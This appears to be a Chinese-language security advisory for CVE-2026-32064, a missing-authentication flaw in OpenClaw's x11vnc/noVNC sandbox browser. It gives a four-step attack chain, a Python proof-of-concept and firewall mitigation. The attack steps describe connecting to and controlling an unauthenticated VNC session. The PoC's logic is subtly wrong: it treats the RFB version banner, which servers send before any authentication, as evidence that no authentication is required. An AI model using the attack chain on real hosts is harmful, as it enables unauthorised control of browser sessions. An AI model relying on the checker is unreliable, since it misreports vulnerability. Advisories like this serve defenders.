CVE-2026-32064 CVSS 7.7 高危

CVE-2026-32064: OpenClaw VNC认证缺失漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32064

漏洞类型

认证缺失

CVSS评分

7.7 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.2.21之前的版本中存在严重的安全漏洞。该漏洞源于沙箱浏览器入口点在为noVNC观察者会话启动x11vnc服务时，未配置任何身份验证机制。这导致攻击者能够通过主机的回环接口连接到暴露的noVNC端口，在无需凭据的情况下观察或与沙箱浏览器进行交互。该漏洞对系统的机密性和完整性造成了高风险影响。

技术细节

该漏洞的原理在于OpenClaw组件在初始化远程桌面会话时，未能正确配置x11vnc的安全参数。x11vnc被启动以支持noVNC功能，但命令行中缺少了密码设置（如-usepw或-rfbauth参数），导致服务以无认证模式运行。根据CVSS向量AV:L，攻击向量为本地，意味着攻击者需要能够访问主机的回环接口（127.0.0.1）。在多用户环境或已攻陷内网的环境中，攻击者可以通过端口扫描发现开放的VNC服务。由于服务未要求认证，攻击者只需建立TCP连接即可通过RFB协议握手，进而获取屏幕画面并发送鼠标键盘事件。这使得攻击者能够完全控制沙箱内的浏览器会话，窃取敏感信息或执行未授权操作。

攻击链分析

STEP 1

1. 获取访问权限

攻击者获得对主机本地回环接口的访问能力，可能通过本地账户访问或网络钓鱼进入内网。

STEP 2

2. 端口扫描

攻击者在本地或回环接口上扫描开放的端口，寻找OpenClaw启动的noVNC或x11vnc服务端口。

STEP 3

3. 建立连接

攻击者使用VNC客户端工具或自定义脚本直接连接到目标端口。

STEP 4

4. 未授权交互

由于服务未配置认证，攻击者成功建立会话，能够查看沙箱浏览器屏幕并进行输入操作，窃取数据或执行命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import socket

# PoC for CVE-2026-32064: OpenClaw Unauthenticated VNC Access
# This script attempts to connect to the VNC port to check for authentication.

def check_vnc_auth(host, port):
    try:
        # Establish TCP connection to the target VNC port
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((host, port))
        
        # VNC Protocol starts with the server sending a version string
        # e.g., "RFB 003.008\n"
        version = s.recv(1024).decode('utf-8').strip()
        print(f"[+] Connected to {host}:{port}")
        print(f"[+] Server Protocol Version: {version}")
        
        # If we receive the version string without being asked for a password,
        # the server is likely vulnerable (or configured for anonymous access).
        print("[!] VNC Service is accessible without initial authentication check.")
        s.close()
        return True

    except ConnectionRefusedError:
        print(f"[-] Connection refused on {host}:{port}")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    # Default x11vnc port is usually 5900, noVNC might map this. 
    # Adjust port based on target configuration.
    TARGET_HOST = "127.0.0.1"
    TARGET_PORT = 5900 
    check_vnc_auth(TARGET_HOST, TARGET_PORT)

影响范围

OpenClaw < 2026.2.21

防御指南

临时缓解措施

在未升级补丁前，建议通过本地防火墙严格限制对noVNC服务端口（通常为5900或6080）的访问，或直接停止受影响的OpenClaw服务以防止未授权访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表